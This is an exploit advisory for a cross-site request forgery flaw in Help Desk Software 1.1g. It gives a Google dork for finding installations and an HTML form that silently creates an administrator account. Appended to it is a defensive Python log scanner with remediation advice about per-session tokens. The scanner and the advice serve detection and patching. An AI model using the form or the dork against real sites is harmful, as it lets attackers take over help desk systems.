Help Desk Software 1.1g XSRF (add admin) Vulnerability



EKU-ID: 874
CVE:
OSVDB-ID:
Author: G13
Published: 2011-08-25
Verified: Verified


# Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g

<html>
<body>
<form id="edit" method="post"
action="http://localhost/request/index.php?sub=users&action=store&type=add"
enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name"
size="35" maxlength="" value=""><br>
Login name:<input class="FormItemTextbox" type="text" name="user_login"
size="20" maxlength="" value=""><br>
Pass:<input class="FormItemTextbox" type="password" id="user_password"
name="user_password" size="20" value=""><br>
Pass confirm:<input class="FormItemTextbox" type="password"
id="user_password_confirm" name="user_password_confirm" size="20"
value=""><br>
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit"
name="submit">
</form>
</body>
</html>
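
The form above submits to the user-creation action with no per-session token, so the server cannot tell a request made from its own admin pages from one triggered by another site. The following is an added example for defenders, not part of the original advisory or of the Help Desk Software code: it scans access logs for POSTs to that action whose Referer is missing or points off-site. The combined log format, the host names and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the web server writes Apache/nginx "combined" format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Query parameters of the user-creation request, taken from the PoC's form action.
ADD_USER_QUERY = {"sub": "users", "action": "store", "type": "add"}

def is_add_user_request(method, target):
    """True for a POST whose query string matches the PoC's form action."""
    if method != "POST":
        return False
    query = parse_qs(urlsplit(target).query)
    return all(query.get(k) == [v] for k, v in ADD_USER_QUERY.items())

def referer_verdict(referer, site_host):
    """Classify a Referer header as 'same-site', 'missing' or 'cross-site'."""
    if referer in ("", "-"):
        return "missing"
    try:
        host = urlsplit(referer).hostname
    except ValueError:  # malformed URL: treat as not coming from the site
        host = None
    return "same-site" if host == site_host.lower() else "cross-site"

def find_suspect_user_adds(lines, site_host):
    """Return (timestamp, client_ip, verdict) for add-user POSTs not sent from the site."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not is_add_user_request(m["method"], m["target"]):
            continue
        verdict = referer_verdict(m["referer"], site_host)
        if verdict != "same-site":
            hits.append((m["ts"], m["ip"], verdict))
    return hits

# Constructed sample log lines (helpdesk.example and other.example are placeholders).
ADD = "POST /request/index.php?sub=users&action=store&type=add HTTP/1.1"
SAMPLE_LOG = [
    f'192.0.2.10 - - [25/Aug/2011:10:01:12 +0000] "{ADD}" 302 - "http://helpdesk.example/request/index.php?sub=users" "Mozilla/5.0"',
    f'192.0.2.10 - - [25/Aug/2011:10:07:45 +0000] "{ADD}" 302 - "http://other.example/page.html" "Mozilla/5.0"',
    f'192.0.2.23 - - [25/Aug/2011:11:30:02 +0000] "{ADD}" 302 - "-" "Mozilla/5.0"',
    '192.0.2.23 - - [25/Aug/2011:11:31:00 +0000] "GET /request/index.php?sub=users HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspect_user_adds(SAMPLE_LOG, "helpdesk.example"):
        print(hit)
```

A missing Referer can also come from browser privacy settings, so those hits need review against the accounts actually created. The log check only finds past requests; closing the issue requires the store action to verify an unpredictable per-session token.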